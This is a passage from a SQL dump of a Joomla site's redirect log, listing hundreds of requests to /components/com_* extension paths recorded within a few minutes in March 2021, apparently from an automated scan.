00:00:00',301),(19027,'https://ekvatorprint.com.ua/components/com_freichat',NULL,'','',1,0,'2021-03-01 13:54:49','0000-00-00 00:00:00',301),(19028,'https://ekvatorprint.com.ua/components/com_bsadv',NULL,'','',1,0,'2021-03-01 13:54:50','0000-00-00 00:00:00',301),(19029,'https://ekvatorprint.com.ua/components/com_movm',NULL,'','',1,0,'2021-03-01 13:54:50','0000-00-00 00:00:00',301),(19030,'https://ekvatorprint.com.ua/components/com_bearleague',NULL,'','',1,0,'2021-03-01 13:54:50','0000-00-00 00:00:00',301),(19031,'https://ekvatorprint.com.ua/components/com_jemembership',NULL,'','',1,0,'2021-03-01 13:54:51','0000-00-00 00:00:00',301),(19032,'https://ekvatorprint.com.ua/components/com_bidding',NULL,'','',1,0,'2021-03-01 13:54:51','0000-00-00 00:00:00',301),(19033,'https://ekvatorprint.com.ua/components/com_slideshow',NULL,'','',1,0,'2021-03-01 13:54:51','0000-00-00 00:00:00',301),(19034,'https://ekvatorprint.com.ua/components/com_adsmanager',NULL,'','',1,0,'2021-03-01 13:54:51','0000-00-00 00:00:00',301),(19035,'https://ekvatorprint.com.ua/components/com_jepropertyfinder',NULL,'','',1,0,'2021-03-01 13:54:52','0000-00-00 00:00:00',301),(19036,'https://ekvatorprint.com.ua/components/com_extrasearch',NULL,'','',1,0,'2021-03-01 13:54:52','0000-00-00 00:00:00',301),(19037,'https://ekvatorprint.com.ua/components/com_xball',NULL,'','',1,0,'2021-03-01 13:54:52','0000-00-00 00:00:00',301),(19038,'https://ekvatorprint.com.ua/components/com_obsuggest',NULL,'','',2,0,'2021-03-01 13:54:52','0000-00-00 00:00:00',301),(19039,'https://ekvatorprint.com.ua/components/com_convertforms',NULL,'','',1,0,'2021-03-01 13:54:52','0000-00-00 00:00:00',301),(19040,'https://ekvatorprint.com.ua/components/com_page',NULL,'','',1,0,'2021-03-01 13:54:53','0000-00-00 00:00:00',301),(19041,'https://ekvatorprint.com.ua/components/com_jeformcr',NULL,'','',1,0,'2021-03-01 13:54:54','0000-00-00 00:00:00',301),(19042,'https://ekvatorprint.com.ua/components/com_userbench',NULL,'','',1,0,'2021-03-01 13:54:54','0000-00-00 00:00:00',301),(19043,'https://ekvatorprint.com.ua/components/com_peliculas',NULL,'','',1,0,'2021-03-01 13:54:54','0000-00-00 00:00:00',301),(19044,'https://ekvatorprint.com.ua/components/com_education_classes',NULL,'','',1,0,'2021-03-01 13:54:55','0000-00-00 00:00:00',301),(19045,'https://ekvatorprint.com.ua/components/com_bookpro',NULL,'','',1,0,'2021-03-01 13:54:55','0000-00-00 00:00:00',301),(19046,'https://ekvatorprint.com.ua/components/com_contentbloglist',NULL,'','',2,0,'2021-03-01 13:54:55','0000-00-00 00:00:00',301),(19047,'https://ekvatorprint.com.ua/components/com_jomestate',NULL,'','',1,0,'2021-03-01 13:54:55','0000-00-00 00:00:00',301),(19048,'https://ekvatorprint.com.ua/components/com_jambook',NULL,'','',1,0,'2021-03-01 13:54:55','0000-00-00 00:00:00',301),(19049,'https://ekvatorprint.com.ua/components/com_mosres',NULL,'','',1,0,'2021-03-01 13:54:56','0000-00-00 00:00:00',301),(19050,'https://ekvatorprint.com.ua/components/com_juser',NULL,'','',1,0,'2021-03-01 13:54:56','0000-00-00 00:00:00',301),(19051,'https://ekvatorprint.com.ua/components/com_jreviews',NULL,'','',1,0,'2021-03-01 13:54:56','0000-00-00 00:00:00',301),(19052,'https://ekvatorprint.com.ua/components/com_autartitarot',NULL,'','',1,0,'2021-03-01 13:54:56','0000-00-00 00:00:00',301),(19053,'https://ekvatorprint.com.ua/components/com_s5_media_player',NULL,'','',1,0,'2021-03-01 13:54:57','0000-00-00 00:00:00',301),(19054,'https://ekvatorprint.com.ua/components/com_productbook',NULL,'','',1,0,'2021-03-01 13:54:57','0000-00-00 00:00:00',301),(19055,'https://ekvatorprint.com.ua/components/com_mezun',NULL,'','',1,0,'2021-03-01 13:54:57','0000-00-00 00:00:00',301),(19056,'https://ekvatorprint.com.ua/components/com_jprojectmanager',NULL,'','',1,0,'2021-03-01 13:54:57','0000-00-00 00:00:00',301),(19057,'https://ekvatorprint.com.ua/components/com_joomlaflickr',NULL,'','',1,0,'2021-03-01 13:54:58','0000-00-00 00:00:00',301),(19058,'https://ekvatorprint.com.ua/components/com_school',NULL,'','',1,0,'2021-03-01 13:54:58','0000-00-00 00:00:00',301),(19059,'https://ekvatorprint.com.ua/components/com_bulkenquery',NULL,'','',1,0,'2021-03-01 13:54:58','0000-00-00 00:00:00',301),(19060,'https://ekvatorprint.com.ua/components/com_joom12pic',NULL,'','',1,0,'2021-03-01 13:54:58','0000-00-00 00:00:00',301),(19061,'https://ekvatorprint.com.ua/components/com_flyspray',NULL,'','',1,0,'2021-03-01 13:54:58','0000-00-00 00:00:00',301),(19062,'https://ekvatorprint.com.ua/components/com_travelbook',NULL,'','',1,0,'2021-03-01 13:54:59','0000-00-00 00:00:00',301),(19063,'https://ekvatorprint.com.ua/components/com_extplorer',NULL,'','',1,0,'2021-03-01 13:54:59','0000-00-00 00:00:00',301),(19064,'https://ekvatorprint.com.ua/components/com_gameq',NULL,'','',1,0,'2021-03-01 13:54:59','0000-00-00 00:00:00',301),(19065,'https://ekvatorprint.com.ua/components/com_beamospetition',NULL,'','',1,0,'2021-03-01 13:54:59','0000-00-00 00:00:00',301),(19066,'https://ekvatorprint.com.ua/components/com_equipment',NULL,'','',1,0,'2021-03-01 13:55:00','0000-00-00 00:00:00',301),(19067,'https://ekvatorprint.com.ua/components/com_seminar',NULL,'','',1,0,'2021-03-01 13:55:00','0000-00-00 00:00:00',301),(19068,'https://ekvatorprint.com.ua/components/com_about',NULL,'','',1,0,'2021-03-01 13:55:00','0000-00-00 00:00:00',301),(19069,'https://ekvatorprint.com.ua/components/com_biblestudy',NULL,'','',1,0,'2021-03-01 13:55:00','0000-00-00 00:00:00',301),(19070,'https://ekvatorprint.com.ua/components/com_eslamiat',NULL,'','',1,0,'2021-03-01 13:55:01','0000-00-00 00:00:00',301),(19071,'https://ekvatorprint.com.ua/components/com_camelcitydb2',NULL,'','',1,0,'2021-03-01 13:55:01','0000-00-00 00:00:00',301),(19072,'https://ekvatorprint.com.ua/components/com_staffmaster',NULL,'','',1,0,'2021-03-01 13:55:01','0000-00-00 00:00:00',301),(19073,'https://ekvatorprint.com.ua/components/com_contentmap',NULL,'','',1,0,'2021-03-01 13:55:01','0000-00-00 00:00:00',301),(19074,'https://ekvatorprint.com.ua/components/com_hello_world',NULL,'','',1,0,'2021-03-01 13:55:02','0000-00-00 00:00:00',301),(19075,'https://ekvatorprint.com.ua/components/com_expedition',NULL,'','',1,0,'2021-03-01 13:55:02','0000-00-00 00:00:00',301),(19076,'https://ekvatorprint.com.ua/components/com_pressrelease',NULL,'','',1,0,'2021-03-01 13:55:02','0000-00-00 00:00:00',301),(19077,'https://ekvatorprint.com.ua/components/com_jw_allvideos',NULL,'','',1,0,'2021-03-01 13:55:02','0000-00-00 00:00:00',301),(19078,'https://ekvatorprint.com.ua/components/com_zina',NULL,'','',1,0,'2021-03-01 13:55:02','0000-00-00 00:00:00',301),(19079,'https://ekvatorprint.com.ua/components/com_xgallery',NULL,'','',1,0,'2021-03-01 13:55:03','0000-00-00 00:00:00',301),(19080,'https://ekvatorprint.com.ua/components/com_ionfiles',NULL,'','',1,0,'2021-03-01 13:55:03','0000-00-00 00:00:00',301),(19081,'https://ekvatorprint.com.ua/components/com_ownbiblio',NULL,'','',1,0,'2021-03-01 13:55:03','0000-00-00 00:00:00',301),(19082,'https://ekvatorprint.com.ua/components/com_pinboard',NULL,'','',1,0,'2021-03-01 13:55:03','0000-00-00 00:00:00',301),(19083,'https://ekvatorprint.com.ua/components/com_agoragroup',NULL,'','',1,0,'2021-03-01 13:55:04','0000-00-00 00:00:00',301),(19084,'https://ekvatorprint.com.ua/components/com_jgive',NULL,'','',1,0,'2021-03-01 13:55:04','0000-00-00 00:00:00',301),(19085,'https://ekvatorprint.com.ua/components/com_is',NULL,'','',1,0,'2021-03-01 13:55:04','0000-00-00 00:00:00',301),(19086,'https://ekvatorprint.com.ua/components/com_a3000',NULL,'','',1,0,'2021-03-01 13:55:04','0000-00-00 00:00:00',301),(19087,'https://ekvatorprint.com.ua/components/com_bt_media',NULL,'','',1,0,'2021-03-01 13:55:04','0000-00-00 00:00:00',301),(19088,'https://ekvatorprint.com.ua/components/com_caproductprices',NULL,'','',1,0,'2021-03-01 13:55:05','0000-00-00 00:00:00',301),(19089,'https://ekvatorprint.com.ua/components/com_showdown',NULL,'','',1,0,'2021-03-01 13:55:05','0000-00-00 00:00:00',301),(19090,'https://ekvatorprint.com.ua/components/com_dhforum',NULL,'','',1,0,'2021-03-01 13:55:05','0000-00-00 00:00:00',301),(19091,'https://ekvatorprint.com.ua/components/com_avosbillets',NULL,'','',1,0,'2021-03-01 13:55:05','0000-00-00 00:00:00',301),(19092,'https://ekvatorprint.com.ua/components/com_science',NULL,'','',1,0,'2021-03-01 13:55:06','0000-00-00 00:00:00',301),(19093,'https://ekvatorprint.com.ua/components/com_jeticket',NULL,'','',1,0,'2021-03-01 13:55:06','0000-00-00 00:00:00',301),(19094,'https://ekvatorprint.com.ua/components/com_airmonoblock',NULL,'','',1,0,'2021-03-01 13:55:06','0000-00-00 00:00:00',301),(19095,'https://ekvatorprint.com.ua/components/com_mdigg',NULL,'','',1,0,'2021-03-01 13:55:06','0000-00-00 00:00:00',301),(19096,'https://ekvatorprint.com.ua/components/com_htmlarea3',NULL,'','',1,0,'2021-03-01 13:55:06','0000-00-00 00:00:00',301),(19097,'https://ekvatorprint.com.ua/components/com_5starhotels',NULL,'','',1,0,'2021-03-01 13:55:07','0000-00-00 00:00:00',301),(19098,'https://ekvatorprint.com.ua/components/com_idoblog',NULL,'','',1,0,'2021-03-01 13:55:07','0000-00-00 00:00:00',301),(19099,'https://ekvatorprint.com.ua/components/com_jcalpro',NULL,'','',1,0,'2021-03-01 13:55:07','0000-00-00 00:00:00',301),(19100,'https://ekvatorprint.com.ua/components/com_graphics',NULL,'','',1,0,'2021-03-01 13:55:07','0000-00-00 00:00:00',301),(19101,'https://ekvatorprint.com.ua/components/com_ynews',NULL,'','',1,0,'2021-03-01 13:55:08','0000-00-00 00:00:00',301),(19102,'https://ekvatorprint.com.ua/components/com_novasfh',NULL,'','',1,0,'2021-03-01 13:55:08','0000-00-00 00:00:00',301),(19103,'https://ekvatorprint.com.ua/components/com_extended',NULL,'','',1,0,'2021-03-01 13:55:08','0000-00-00 00:00:00',301),(19104,'https://ekvatorprint.com.ua/components/com_fsave',NULL,'','',1,0,'2021-03-01 13:55:08','0000-00-00 00:00:00',301),(19105,'https://ekvatorprint.com.ua/components/com_vjdeo',NULL,'','',1,0,'2021-03-01 13:55:08','0000-00-00 00:00:00',301),(19106,'https://ekvatorprint.com.ua/components/com_cartweberp',NULL,'','',1,0,'2021-03-01 13:55:09','0000-00-00 00:00:00',301),(19107,'https://ekvatorprint.com.ua/components/com_clubmanager',NULL,'','',1,0,'2021-03-01 13:55:09','0000-00-00 00:00:00',301),(19108,'https://ekvatorprint.com.ua/components/com_otzivi',NULL,'','',1,0,'2021-03-01 13:55:09','0000-00-00 00:00:00',301),(19109,'https://ekvatorprint.com.ua/components/com_iomezun',NULL,'','',1,0,'2021-03-01 13:55:09','0000-00-00 00:00:00',301),(19110,'https://ekvatorprint.com.ua/components/com_jobprofile',NULL,'','',1,0,'2021-03-01 13:55:10','0000-00-00 00:00:00',301),(19111,'https://ekvatorprint.com.ua/components/com_lyftenbloggie',NULL,'','',1,0,'2021-03-01 13:55:10','0000-00-00 00:00:00',301),(19112,'https://ekvatorprint.com.ua/components/com_comprofiler',NULL,'','',1,0,'2021-03-01 13:55:10','0000-00-00 00:00:00',301),(19113,'https://ekvatorprint.com.ua/components/com_bnf',NULL,'','',1,0,'2021-03-01 13:55:10','0000-00-00 00:00:00',301),(19114,'https://ekvatorprint.com.ua/components/com_portafolio',NULL,'','',1,0,'2021-03-01 13:55:11','0000-00-00 00:00:00',301),(19115,'https://ekvatorprint.com.ua/components/com_foto',NULL,'','',1,0,'2021-03-01 13:55:11','0000-00-00 00:00:00',301),(19116,'https://ekvatorprint.com.ua/components/com_competitions',NULL,'','',1,0,'2021-03-01 13:55:11','0000-00-00 00:00:00',301),(19117,'https://ekvatorprint.com.ua/components/com_jembedall',NULL,'','',1,0,'2021-03-01 13:55:11','0000-00-00 00:00:00',301),(19118,'https://ekvatorprint.com.ua/components/com_hwdvideoshare',NULL,'','',1,0,'2021-03-01 13:55:12','0000-00-00 00:00:00',301),(19119,'https://ekvatorprint.com.ua/components/com_gantry',NULL,'','',1,0,'2021-03-01 13:55:12','0000-00-00 00:00:00',301),(19120,'https://ekvatorprint.com.ua/components/com_juliaportfolio',NULL,'','',1,0,'2021-03-01 13:55:12','0000-00-00 00:00:00',301),(19121,'https://ekvatorprint.com.ua/components/com_smf',NULL,'','',1,0,'2021-03-01 13:55:12','0000-00-00 00:00:00',301),(19122,'https://ekvatorprint.com.ua/components/com_horoscope',NULL,'','',1,0,'2021-03-01 13:55:13','0000-00-00 00:00:00',301),(19123,'https://ekvatorprint.com.ua/components/com_iigcatalog',NULL,'','',1,0,'2021-03-01 13:55:13','0000-00-00 00:00:00',301),(19124,'https://ekvatorprint.com.ua/components/com_rssxt',NULL,'','',1,0,'2021-03-01 13:55:13','0000-00-00 00:00:00',301),(19125,'https://ekvatorprint.com.ua/components/com_ybggal',NULL,'','',1,0,'2021-03-01 13:55:13','0000-00-00 00:00:00',301),(19126,'https://ekvatorprint.com.ua/components/com_blog_calendar',NULL,'','',1,0,'2021-03-01 13:55:14','0000-00-00 00:00:00',301),(19127,'https://ekvatorprint.com.ua/components/com_admin',NULL,'','',1,0,'2021-03-01 13:55:14','0000-00-00 00:00:00',301),(19128,'https://ekvatorprint.com.ua/components/com_trade',NULL,'','',1,0,'2021-03-01 13:55:14','0000-00-00 00:00:00',301),(19129,'https://ekvatorprint.com.ua/components/com_product_modul',NULL,'','',1,0,'2021-03-01 13:55:14','0000-00-00 00:00:00',301),(19130,'https://ekvatorprint.com.ua/components/com_xvs',NULL,'','',1,0,'2021-03-01 13:55:15','0000-00-00 00:00:00',301),(19131,'https://ekvatorprint.com.ua/components/com_x',NULL,'','',1,0,'2021-03-01 13:55:15','0000-00-00 00:00:00',301),(19132,'https://ekvatorprint.com.ua/components/com_full',NULL,'','',1,0,'2021-03-01 13:55:15','0000-00-00 00:00:00',301),(19133,'https://ekvatorprint.com.ua/components/com_masterforms',NULL,'','',1,0,'2021-03-01 13:55:15','0000-00-00 00:00:00',301),(19134,'https://ekvatorprint.com.ua/components/com_jnews',NULL,'','',1,0,'2021-03-01 13:55:15','0000-00-00 00:00:00',301),(19135,'https://ekvatorprint.com.ua/components/com_lead',NULL,'','',1,0,'2021-03-01 13:55:16','0000-00-00 00:00:00',301),(19136,'https://ekvatorprint.com.ua/components/com_spidercatalog',NULL,'','',1,0,'2021-03-01 13:55:16','0000-00-00 00:00:00',301),(19137,'https://ekvatorprint.com.ua/components/com_gsticketsystem',NULL,'','',1,0,'2021-03-01 13:55:16','0000-00-00 00:00:00',301),(19138,'https://ekvatorprint.com.ua/components/com_tech',NULL,'','',1,0,'2021-03-01 13:55:16','0000-00-00 00:00:00',301),(19139,'https://ekvatorprint.com.ua/components/com_properties',NULL,'','',1,0,'2021-03-01 13:55:17','0000-00-00 00:00:00',301),(19140,'https://ekvatorprint.com.ua/components/com_brightweblinks',NULL,'','',1,0,'2021-03-01 13:55:17','0000-00-00 00:00:00',301),(19141,'https://ekvatorprint.com.ua/components/com_alert',NULL,'','',1,0,'2021-03-01 13:55:17','0000-00-00 00:00:00',301),(19142,'https://ekvatorprint.com.ua/components/com_contact_enhanced',NULL,'','',1,0,'2021-03-01 13:55:17','0000-00-00 00:00:00',301),(19143,'https://ekvatorprint.com.ua/components/com_jotloader',NULL,'','',1,0,'2021-03-01 13:55:18','0000-00-00 00:00:00',301),(19144,'https://ekvatorprint.com.ua/components/com_caddy',NULL,'','',1,0,'2021-03-01 13:55:18','0000-00-00 00:00:00',301),(19145,'https://ekvatorprint.com.ua/components/com_jabode',NULL,'','',1,0,'2021-03-01 13:55:18','0000-00-00 00:00:00',301),(19146,'https://ekvatorprint.com.ua/components/com_tsonymf',NULL,'','',1,0,'2021-03-01 13:55:18','0000-00-00 00:00:00',301),(19147,'https://ekvatorprint.com.ua/components/com_jequoteform',NULL,'','',1,0,'2021-03-01 13:55:18','0000-00-00 00:00:00',301),(19148,'https://ekvatorprint.com.ua/components/com_idvnews',NULL,'','',1,0,'2021-03-01 13:55:19','0000-00-00 00:00:00',301),(19149,'https://ekvatorprint.com.ua/components/com_astatspro',NULL,'','',1,0,'2021-03-01 13:55:19','0000-00-00 00:00:00',301),(19150,'https://ekvatorprint.com.ua/components/com_appointinator',NULL,'','',1,0,'2021-03-01 13:55:19','0000-00-00 00:00:00',301),(19151,'https://ekvatorprint.com.ua/components/com_aardvertiser',NULL,'','',1,0,'2021-03-01 13:55:19','0000-00-00 00:00:00',301),(19152,'https://ekvatorprint.com.ua/components/com_picasa2gallery',NULL,'','',1,0,'2021-03-01 13:55:19','0000-00-00 00:00:00',301),(19153,'https://ekvatorprint.com.ua/components/com_dioneformwizard',NULL,'','',1,0,'2021-03-01 13:55:20','0000-00-00 00:00:00',301),(19154,'https://ekvatorprint.com.ua/components/com_extended_registration',NULL,'','',1,0,'2021-03-01 13:55:20','0000-00-00 00:00:00',301),(19155,'https://ekvatorprint.com.ua/components/com_jp_jobs',NULL,'','',1,0,'2021-03-01 13:55:20','0000-00-00 00:00:00',301),(19156,'https://ekvatorprint.com.ua/components/com_expose',NULL,'','',1,0,'2021-03-01 13:55:20','0000-00-00 00:00:00',301),(19157,'https://ekvatorprint.com.ua/components/com_foevpartners',NULL,'','',1,0,'2021-03-01 13:55:21','0000-00-00 00:00:00',301),(19158,'https://ekvatorprint.com.ua/components/com_spsnewsletter',NULL,'','',1,0,'2021-03-01 13:55:21','0000-00-00 00:00:00',301),(19159,'https://ekvatorprint.com.ua/components/com_acooldebate',NULL,'','',1,0,'2021-03-01 13:55:21','0000-00-00 00:00:00',301),(19160,'https://ekvatorprint.com.ua/components/com_jofacebookgallery',NULL,'','',1,0,'2021-03-01 13:55:21','0000-00-00 00:00:00',301),(19161,'https://ekvatorprint.com.ua/components/com_smartseller',NULL,'','',1,0,'2021-03-01 13:55:22','0000-00-00 00:00:00',301),(19162,'https://ekvatorprint.com.ua/components/com_articleman',NULL,'','',1,0,'2021-03-01 13:55:22','0000-00-00 00:00:00',301),(19163,'https://ekvatorprint.com.ua/components/com_onismusic',NULL,'','',1,0,'2021-03-01 13:55:22','0000-00-00 00:00:00',301),(19164,'https://ekvatorprint.com.ua/components/com_acysms',NULL,'','',1,0,'2021-03-01 13:55:22','0000-00-00 00:00:00',301),(19165,'https://ekvatorprint.com.ua/components/com_vikappointments',NULL,'','',1,0,'2021-03-01 13:55:22','0000-00-00 00:00:00',301),(19166,'https://ekvatorprint.com.ua/components/com_cropimage',NULL,'','',1,0,'2021-03-01 13:55:23','0000-00-00 00:00:00',301),(19167,'https://ekvatorprint.com.ua/components/com_jradio',NULL,'','',1,0,'2021-03-01 13:55:23','0000-00-00 00:00:00',301),(19168,'https://ekvatorprint.com.ua/components/com_family',NULL,'','',1,0,'2021-03-01 13:55:23','0000-00-00 00:00:00',301),(19169,'https://ekvatorprint.com.ua/components/com_foxcontact',NULL,'','',1,0,'2021-03-01 13:55:23','0000-00-00 00:00:00',301),(19170,'https://ekvatorprint.com.ua/components/com_ganalytics',NULL,'','',1,0,'2021-03-01 13:55:24','0000-00-00 00:00:00',301),(19171,'https://ekvatorprint.com.ua/components/com_jux_real_estate',NULL,'','',1,0,'2021-03-01 13:55:24','0000-00-00 00:00:00',301),(19172,'https://ekvatorprint.com.ua/components/com_minibb',NULL,'','',1,0,'2021-03-01 13:55:24','0000-00-00 00:00:00',301),(19173,'https://ekvatorprint.com.ua/components/com_faqbook',NULL,'','',1,0,'2021-03-01 13:55:24','0000-00-00 00:00:00',301),(19174,'https://ekvatorprint.com.ua/components/com_jegridfolio',NULL,'','',1,0,'2021-03-01 13:55:25','0000-00-00 00:00:00',301),(19175,'https://ekvatorprint.com.ua/components/com_paxxgallery',NULL,'','',1,0,'2021-03-01 13:55:25','0000-00-00 00:00:00',301),(19176,'https://ekvatorprint.com.ua/components/com_cckjseblod',NULL,'','',1,0,'2021-03-01 13:55:25','0000-00-00 00:00:00',301),(19177,'https://ekvatorprint.com.ua/components/com_addproperty',NULL,'','',1,0,'2021-03-01 13:55:25','0000-00-00 00:00:00',301),(19178,'https://ekvatorprint.com.ua/components/com_phocadownload',NULL,'','',1,0,'2021-03-01 13:55:25','0000-00-00 00:00:00',301),(19179,'https://ekvatorprint.com.ua/components/com_livechat',NULL,'','',1,0,'2021-03-01 13:55:26','0000-00-00 00:00:00',301),(19180,'https://ekvatorprint.com.ua/components/com_expshop',NULL,'','',1,0,'2021-03-01 13:55:26','0000-00-00 00:00:00',301),(19181,'https://ekvatorprint.com.ua/components/com_feederator',NULL,'','',1,0,'2021-03-01 13:55:26','0000-00-00 00:00:00',301),(19182,'https://ekvatorprint.com.ua/components/com_resman',NULL,'','',1,0,'2021-03-01 13:55:26','0000-00-00 00:00:00',301),(19183,'https://ekvatorprint.com.ua/components/com_xobbix',NULL,'','',1,0,'2021-03-01 13:55:27','0000-00-00 00:00:00',301),(19184,'https://ekvatorprint.com.ua/components/com_leader',NULL,'','',1,0,'2021-03-01 13:55:27','0000-00-00 00:00:00',301),(19185,'https://ekvatorprint.com.ua/components/com_osdownloads',NULL,'','',1,0,'2021-03-01 13:55:27','0000-00-00 00:00:00',301),(19186,'https://ekvatorprint.com.ua/components/com_joomgalaxy',NULL,'','',1,0,'2021-03-01 13:55:27','0000-00-00 00:00:00',301),(19187,'https://ekvatorprint.com.ua/components/com_download',NULL,'','',1,0,'2021-03-01 13:55:28','0000-00-00 00:00:00',301),(19188,'https://ekvatorprint.com.ua/components/com_maian15',NULL,'','',1,0,'2021-03-01 13:55:28','0000-00-00 00:00:00',301),(19189,'https://ekvatorprint.com.ua/components/com_artlinks',NULL,'','',1,0,'2021-03-01 13:55:28','0000-00-00 00:00:00',301),(19190,'https://ekvatorprint.com.ua/components/com_jetour',NULL,'','',1,0,'2021-03-01 13:55:28','0000-00-00 00:00:00',301),(19191,'https://ekvatorprint.com.ua/components/com_news',NULL,'','',1,0,'2021-03-01 13:55:28','0000-00-00 00:00:00',301),(19192,'https://ekvatorprint.com.ua/components/com_netinvoice',NULL,'','',1,0,'2021-03-01 13:55:29','0000-00-00 00:00:00',301),(19193,'https://ekvatorprint.com.ua/components/com_serverstat',NULL,'','',1,0,'2021-03-01 13:55:29','0000-00-00 00:00:00',301),(19194,'https://ekvatorprint.com.ua/components/com_gds',NULL,'','',1,0,'2021-03-01 13:55:29','0000-00-00 00:00:00',301),(19195,'https://ekvatorprint.com.ua/components/com_jcommunity',NULL,'','',1,0,'2021-03-01 13:55:29','0000-00-00 00:00:00',301),(19196,'https://ekvatorprint.com.ua/components/com_jd',NULL,'','',1,0,'2021-03-01 13:55:30','0000-00-00 00:00:00',301),(19197,'https://ekvatorprint.com.ua/components/com_oziogallery2',NULL,'','',1,0,'2021-03-01 13:55:30','0000-00-00 00:00:00',301),(19198,'https://ekvatorprint.com.ua/components/com_modern_booking',NULL,'','',1,0,'2021-03-01 13:55:30','0000-00-00 00:00:00',301),(19199,'https://ekvatorprint.com.ua/components/com_dadamail',NULL,'','',1,0,'2021-03-01 13:55:30','0000-00-00 00:00:00',301),(19200,'https://ekvatorprint.com.ua/components/com_versioning',NULL,'','',1,0,'2021-03-01 13:55:31','0000-00-00 00:00:00',301),(19201,'https://ekvatorprint.com.ua/components/com_gadgetfactory',NULL,'','',1,0,'2021-03-01 13:55:31','0000-00-00 00:00:00',301),(19202,'https://ekvatorprint.com.ua/components/com_worldrates',NULL,'','',1,0,'2021-03-01 13:55:31','0000-00-00 00:00:00',301),(19203,'https://ekvatorprint.com.ua/components/com_photoblog',NULL,'','',1,0,'2021-03-01 13:55:31','0000-00-00 00:00:00',301),(19204,'https://ekvatorprint.com.ua/components/com_htmlarea3_xtd',NULL,'','',1,0,'2021-03-01 13:55:32','0000-00-00 00:00:00',301),(19205,'https://ekvatorprint.com.ua/components/com_sweetykeeper',NULL,'','',1,0,'2021-03-01 13:55:32','0000-00-00 00:00:00',301),(19206,'https://ekvatorprint.com.ua/components/com_payage',NULL,'','',1,0,'2021-03-01 13:55:32','0000-00-00 00:00:00',301),(19207,'https://ekvatorprint.com.ua/components/com_siirler',NULL,'','',1,0,'2021-03-01 13:55:32','0000-00-00 00:00:00',301),(19208,'https://ekvatorprint.com.ua/components/com_mod_dvfoldercontent',NULL,'','',1,0,'2021-03-01 13:55:32','0000-00-00 00:00:00',301),(19209,'https://ekvatorprint.com.ua/components/com_if_nexus',NULL,'','',1,0,'2021-03-01 13:55:33','0000-00-00 00:00:00',301),(19210,'https://ekvatorprint.com.ua/components/com_misterestate',NULL,'','',1,0,'2021-03-01 13:55:33','0000-00-00 00:00:00',301),(19211,'https://ekvatorprint.com.ua/components/com_alfresco',NULL,'','',1,0,'2021-03-01 13:55:33','0000-00-00 00:00:00',301),(19212,'https://ekvatorprint.com.ua/components/com_macgallery',NULL,'','',1,0,'2021-03-01 13:55:33','0000-00-00 00:00:00',301),(19213,'https://ekvatorprint.com.ua/components/com_coupon',NULL,'','',1,0,'2021-03-01 13:55:34','0000-00-00 00:00:00',301),(19214,'https://ekvatorprint.com.ua/components/com_hashcash',NULL,'','',1,0,'2021-03-01 13:55:34','0000-00-00 00:00:00',301),(19215,'https://ekvatorprint.com.ua/components/com_jbdiary',NULL,'','',1,0,'2021-03-01 13:55:34','0000-00-00 00:00:00',301),(19216,'https://ekvatorprint.com.ua/components/com_hmcommunity',NULL,'','',1,0,'2021-03-01 13:55:34','0000-00-00 00:00:00',301),(19217,'https://ekvatorprint.com.ua/components/com_filiale',NULL,'','',1,0,'2021-03-01 13:55:34','0000-00-00 00:00:00',301),(19218,'https://ekvatorprint.com.ua/components/com_portfol',NULL,'','',1,0,'2021-03-01 13:55:35','0000-00-00 00:00:00',301),(19219,'https://ekvatorprint.com.ua/components/com_countries',NULL,'','',1,0,'2021-03-01 13:55:35','0000-00-00 00:00:00',301),(19220,'https://ekvatorprint.com.ua/components/com_jinventory',NULL,'','',1,0,'2021-03-01 13:55:35','0000-00-00 00:00:00',301),(19221,'https://ekvatorprint.com.ua/components/com_nbreal',NULL,'','',1,0,'2021-03-01 13:55:35','0000-00-00 00:00:00',301),(19222,'https://ekvatorprint.com.ua/components/com_jeawdsong',NULL,'','',1,0,'2021-03-01 13:55:36','0000-00-00 00:00:00',301),(19223,'https://ekvatorprint.com.ua/components/com_lowcosthotels',NULL,'','',1,0,'2021-03-01 13:55:36','0000-00-00 00:00:00',301),(19224,'https://ekvatorprint.com.ua/components/com_classifieds',NULL,'','',1,0,'2021-03-01 13:55:36','0000-00-00 00:00:00',301),(19225,'https://ekvatorprint.com.ua/components/com_digistore',NULL,'','',1,0,'2021-03-01 13:55:36','0000-00-00 00:00:00',301),(19226,'https://ekvatorprint.com.ua/components/com_jooget',NULL,'','',1,0,'2021-03-01 13:55:37','0000-00-00 00:00:00',301),(19227,'https://ekvatorprint.com.ua/components/com_jbudgetsmagic',NULL,'','',1,0,'2021-03-01 13:55:37','0000-00-00 00:00:00',301),(19228,'https://ekvatorprint.com.ua/components/com_dm_orders',NULL,'','',1,0,'2021-03-01 13:55:37','0000-00-00 00:00:00',301),(19229,'https://ekvatorprint.com.ua/components/com_googlebase',NULL,'','',1,0,'2021-03-01 13:55:37','0000-00-00 00:00:00',301),(19230,'https://ekvatorprint.com.ua/components/com_loudmounth',NULL,'','',1,0,'2021-03-01 13:55:38','0000-00-00 00:00:00',301),(19231,'https://ekvatorprint.com.ua/components/com_poweradmin',NULL,'','',1,0,'2021-03-01 13:55:38','0000-00-00 00:00:00',301),(19232,'https://ekvatorprint.com.ua/components/com_twitchtv',NULL,'','',1,0,'2021-03-01 13:55:38','0000-00-00 00:00:00',301),(19233,'https://ekvatorprint.com.ua/components/com_mosets',NULL,'','',1,0,'2021-03-01 13:55:38','0000-00-00 00:00:00',301),(19234,'https://ekvatorprint.com.ua/components/com_uhp',NULL,'','',1,0,'2021-03-01 13:55:39','0000-00-00 00:00:00',301),(19235,'https://ekvatorprint.com.ua/components/com_timetrack',NULL,'','',1,0,'2021-03-01 13:55:39','0000-00-00 00:00:00',301),(19236,'https://ekvatorprint.com.ua/components/com_detail',NULL,'','',1,0,'2021-03-01 13:55:39','0000-00-00 00:00:00',301),(19237,'https://ekvatorprint.com.ua/components/com_model',NULL,'','',1,0,'2021-03-01 13:55:39','0000-00-00 00:00:00',301),(19238,'https://ekvatorprint.com.ua/components/com_mospray',NULL,'','',1,0,'2021-03-01 13:55:40','0000-00-00 00:00:00',301),(19239,'https://ekvatorprint.com.ua/components/com_jsplocation',NULL,'','',1,0,'2021-03-01 13:55:40','0000-00-00 00:00:00',301),(19240,'https://ekvatorprint.com.ua/components/com_neorecruit',NULL,'','',1,0,'2021-03-01 13:55:40','0000-00-00 00:00:00',301),(19241,'https://ekvatorprint.com.ua/components/com_joomladate',NULL,'','',1,0,'2021-03-01 13:55:40','0000-00-00 00:00:00',301),(19242,'https://ekvatorprint.com.ua/components/com_jvcomment',NULL,'','',1,0,'2021-03-01 13:55:41','0000-00-00 00:00:00',301),(19243,'https://ekvatorprint.com.ua/components/com_cms',NULL,'','',1,0,'2021-03-01 